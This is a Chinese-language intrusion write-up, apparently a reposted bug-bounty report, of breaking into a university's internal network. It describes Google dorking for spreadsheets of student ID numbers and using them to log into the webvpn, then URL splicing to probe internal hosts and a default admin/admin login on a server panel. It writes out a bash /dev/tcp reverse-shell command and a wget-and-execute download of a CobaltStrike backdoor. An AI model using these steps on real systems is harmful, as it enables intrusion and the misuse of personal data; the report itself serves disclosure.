前言

能完成這次滲透純屬是信息收集做到位了。很多其實都是分散的信息，在某一次關鍵點集合起來就有可能拿到權限。這個漏洞已提交補天并修復完成了。

信息收集

一、發(fā)現(xiàn)敏感信息

此次使用的方法：

• Google Hack
• Github Hack（沒有收獲）
• 前端信息泄露
• ARL 燈塔資產(chǎn)收集（子域名、IP、端口服務、文件泄露）

通過使用 filetype:xls site:xxx.edu.cn 身份 去搜索發(fā)現(xiàn)了不少帶身份證表字段的表，但是是否真的有敏感信息還要一個個去下載審查。

發(fā)現(xiàn)一個標題為名單，我猜測肯定有信息，下載后打開。

二、發(fā)現(xiàn)入口點

【→所有資源關注我，私信回復“資料”獲取←】
1、網(wǎng)絡安全學習路線
2、電子書籍（白帽子）
3、安全大廠內部視頻
4、100份src文檔
5、常見安全面試題
6、ctf大賽經(jīng)典題目解析
7、全套工具包
8、應急響應筆記

在 ARL 資產(chǎn)列表中有一個 webvpn，我心想這不就是內網(wǎng)入口嗎？

發(fā)現(xiàn)需要身份證和學號登陸，這些都可以從剛才那張表拿到。隨便挑一個登陸。

發(fā)現(xiàn)只有一個應用能夠點擊，直接訪問后觀察 URl 發(fā)現(xiàn)是有規(guī)律的。

三、vpn 分配

http://xxx-xxx-edu-cn-s.xxx.xxx.edu.cn:8118/

結構應當是這樣的

http://[訪問地址].xxx.xxx.edu.cn:8118

可以變化的是訪問地址，那么為了驗證我的猜想，直接返回系統(tǒng)界面。

將這個地址改變成：2021-ip138-com 去做個拼接

發(fā)現(xiàn)完全可行。

四、前端信息泄露

在抓包 www.xxx.edu.cn 官網(wǎng)的時候我發(fā)現(xiàn)了一處內網(wǎng)地址

五、嘗試訪問

10.30.252.33，我再次拼接。

訪問失敗了，但是我猜測這個應當是提供校園網(wǎng)站服務器主機的網(wǎng)段。嘗試修改 C段訪問。

當我訪問到 10.30.252.23 的時候發(fā)現(xiàn)是能夠正常訪問的，也就是說可以進行內網(wǎng)探測，但是似乎沒發(fā)指定端口和 https 訪問。沒有頭緒，只能 Google 看看有沒有其他地址記錄的先例。

site:xxx.xxx.edu.cn:8118

發(fā)現(xiàn)一處地址 http://xxx-xxx-edu-cn-8090-p-s.xxx.xxx.edu.cn:8118/surveydetail.aspx?pid=5&cid=397

原來我們直接使用 -8080-p 即可指定端口，而 -s 則是指定 https 訪問。
如此一來我們可以進行手工內網(wǎng)探測了。

內網(wǎng) shell

在進過一番測試后，找到了一個寶塔地址。

直接上手弱口令

賬號密碼

admin	admin

成功進入后，去任務計劃

反彈shell 安排上 bash -i >& /dev/tcp/IP/PORT 0>&1

上去之后再下載 VPS 上的 CobaltStrike (Cross2插件) Linux 后門

wget http://IP:PORT/SHELLCODE && chmod +x SHELLCODE && ./SHELLCODE

服務器成功上線。

總結

滲透最為重要的一環(huán)也是滲透的起點，那就是對于目標的信息收集。一些毫不起眼的數(shù)據(jù)往往能達到突破的作用，這整一套下來不是偶然而是必然。

總結

以上是生活随笔為你收集整理的【漏洞实战】从信息泄露到内网滲透的全部內容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網(wǎng)站內容還不錯，歡迎將生活随笔推薦給好友。